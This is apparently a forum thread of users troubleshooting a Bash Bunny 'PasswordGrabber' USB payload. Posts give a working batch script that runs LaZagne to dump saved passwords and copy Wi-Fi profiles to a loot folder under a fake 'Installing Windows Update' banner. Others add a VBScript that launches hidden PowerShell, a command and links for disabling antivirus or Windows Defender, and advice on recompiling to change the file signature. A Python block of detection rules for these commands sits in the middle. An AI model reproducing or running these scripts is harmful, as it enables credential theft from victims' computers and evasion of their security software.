
PasswordGrabber by LazaGne Not Working


Cech

Hey guys, I've recently bought a Bash Bunny and I've tried to set PasswordGrabber on Switch2. I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md). Once I switch it from arming mode to switch2 (attack mode) and place it into a victim's PC (test PC) on Windows 10, the green LED starts to flash within a few seconds (which probably means to remove it, right?)

 

Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong? 

 

Thank you in advance guys

Link to comment
Share on other sites

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works, for illustration. I also attached the version of it I created and which works, tested on the latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Link to comment
Share on other sites

Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing. 

i.vbs

Set objShell = CreateObject("WScript.Shell")

strPath = Wscript.ScriptFullName

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(strPath)
strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd"

objShell.Run strFolder


and then just remove %~dp0\e.cmd from d.cmd

Link to comment
Share on other sites
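
For defenders, the process activity that the e.cmd and i.vbs posts above describe can be matched in process-creation telemetry. The following is an added example, not code from the thread or from the payload's authors; the event field names, host names and the `E:\payloads\switch2` path are constructed for illustration.

```python
import re

def _has(pattern, text):
    return re.search(pattern, text, re.I) is not None

# Behavioural rules built from the command lines quoted in this thread.
RULES = {
    "script-host-spawns-hidden-powershell": lambda e: (
        _has(r"\\[wc]script\.exe$", e["parent"])
        and _has(r"\\powershell\.exe$", e["image"])
        and _has(r"-w(indowstyle)?\s+hidden", e["cmd"])),
    "wlan-profile-store-copied": lambda e: (
        _has(r"\\xcopy\.exe$", e["image"])
        and _has(r"\\Wlansvc\\Profiles\\Interfaces", e["cmd"])),
    "lazagne-all-modules": lambda e: _has(r"lazagne(\.exe)?\"?\s+all\b", e["cmd"]),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS = "C:\\Windows\\System32\\"
# Constructed process-creation events (not captured logs); E:\ stands in for the USB volume.
EVENTS = [
    {"host": "WS-TEST01", "parent": SYS + "wscript.exe", "image": PS,
     "cmd": r"powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced E:\payloads\switch2\e.cmd"},
    {"host": "WS-TEST01", "parent": SYS + "cmd.exe", "image": r"E:\payloads\switch2\laZagne.exe",
     "cmd": r"E:\payloads\switch2\laZagne.exe all -v"},
    {"host": "WS-TEST01", "parent": SYS + "cmd.exe", "image": SYS + "xcopy.exe",
     "cmd": r"xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* E:\loot\x"},
    {"host": "WS-TEST02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "WS-TEST03", "parent": SYS + "wscript.exe", "image": PS,
     "cmd": r"powershell -WindowStyle Hidden -File C:\IT\inventory.ps1"},
]

def triage(events):
    """Map host -> (severity, fired rules); 'high' needs two or more distinct rules."""
    fired = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                fired.setdefault(e["host"], set()).add(name)
    return {h: ("high" if len(r) >= 2 else "review", sorted(r)) for h, r in fired.items()}

if __name__ == "__main__":
    for host, (severity, rules) in triage(EVENTS).items():
        print(host, severity, ", ".join(rules))
```

A single hidden PowerShell launched by a script host is only marked for review, since administrative scripts do this too; the combination of rules on one host is what raises the severity.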

  • 2 months later...
14 hours ago, Am3ience said:

Isn't there also a problem with the PasswordGrabber payload wanting the LaZagne.exe in the tools folder? But every time you re-arm the bunny it deletes the .exe

You could paste a little piece of code before that, that disables the AV:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

Link to comment
Share on other sites

1 hour ago, C1PH3R said:

You could paste a little piece of code before that, that disables the AV:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Link to comment
Share on other sites

  • 1 month later...
12 hours ago, Spoonman said:

 

Yeah, Windows Defender needs to be turned off. I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible.

A better way would be to compile the code yourself and add a couple of comments to change the file signature.

Link to comment
Share on other sites

  • 2 weeks later...

I have been playing with Python for hours trying to figure out how to compile this. It can't be that complicated. I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors. Is there an earlier version of Python or somewhere that gives compile instructions?

Link to comment
Share on other sites

  • 2 weeks later...
2 hours ago, DennisVeninga said:

I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

I have done what you say and it doesn't work for me. Why? I am new at this, help.

Link to comment
Share on other sites

  • 3 weeks later...
On 11/25/2017 at 5:50 PM, Struthian said:

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works, for illustration. I also attached the version of it I created and which works, tested on the latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Hello, you have function USB_Exfiltration and PasswordGrabber? Could you share the files please?


 
Link to comment
Share on other sites
